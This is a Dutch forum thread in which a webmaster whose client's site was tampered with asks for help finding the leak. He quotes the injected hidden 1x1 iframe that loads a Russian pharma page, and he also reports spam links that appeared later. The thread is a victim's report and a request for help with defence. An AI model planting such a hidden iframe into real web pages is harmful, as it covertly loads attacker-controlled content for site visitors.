Gehackt?

Status
Niet open voor verdere reacties.

0dd0w

Nieuwe gebruiker
Lid geworden
13 mrt 2008
Hallo,

Van een klant waarvoor ik een site gebouwd heb ontving een mailtje dat er ineens ongewenst venster geopend wordt bij het bezoeken van de site. Tot mijn grote verbazing bleek inderdaad de broncode gewijzigd te zijn: mijn originele index.html van 5 juli 2006 blijkt op 19 februari van dit jaar door wie dan ook veranderd te zijn (ik was het in ieder geval niet). Onderin bleek het volgende toegevoegd te zijn:
<iframe width=1 height=1 border=0 frameborder=0 src="http://www.pharmgame.ru/counter/client.php"></iframe>

Niet erg kwaadaardig maar toch zeeeeer ongewenst :evil:

Mijn webspaceprovider meent dat de fout bij mij moet liggen en dat ik m'n PC maar beter moet beschermen. Ze suggereren dat een hacker zich via mijn (met Sygate Personal Firewall Pro en NOD32 beschermde) PC de toegang heeft verschaft. Deze hacker weet
blijkbaar dat ik de beheerder ben van deze site, heeft ergens mijn inlognaam en wachtwoord hiervoor opgespoord en tot slot de index.html veranderd en geupload.
Ik vind dit erg ongeloofwaardig, en op zijn minst bijzonder omslachtig. De andere sites
die ik onder beheer heb zijn niet gewijzigd.
Is het niet veel waarschijnlijker dat een hacker direct toegang had tot de server waar index.html op draait om het bestand daar te veranderen? En als Het Lek toch bij mij ligt, wat kan ik dan doen? Want dit mag niet nogmaals gebeuren.

Groeten en dank,
0dd0w.

Interessant, maar er staat niet bij hoe ik kan checken of dat bij mij ook het geval was. Of dat het probleem mogelijk toch bij mijn webhost ligt.:(
Wat te doen?

0dd0w.

Vinger in de dijk.

Ik weet nog steeds niet waar ik het lek moet zoeken. :(

... iemand ...?

Lek niet gedicht.

Het probleem is nog steeds niet opgelost. Sterker nog: op 17 maart zijn er opnieuw ilinks in alle vijf online html-files verschenen (van xxxsextours o.i.d.). Mijn provider denkt nog steeds dat de oorzaak bij mij ligt, wat ik erg vreemd vind want er zijn online html-files gehackt die ik niet eens in gebruik heb of zelfs maar op mijn computer heb staan.
Als iemand nog een suggestie heeft, dan graag.:confused:
Vriendelijke groet, 0dd0w.

Heb je als je wachtwoord veranderd en eens een andere virusscan over je pc gehaald dan die je nu gebruikt?

Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan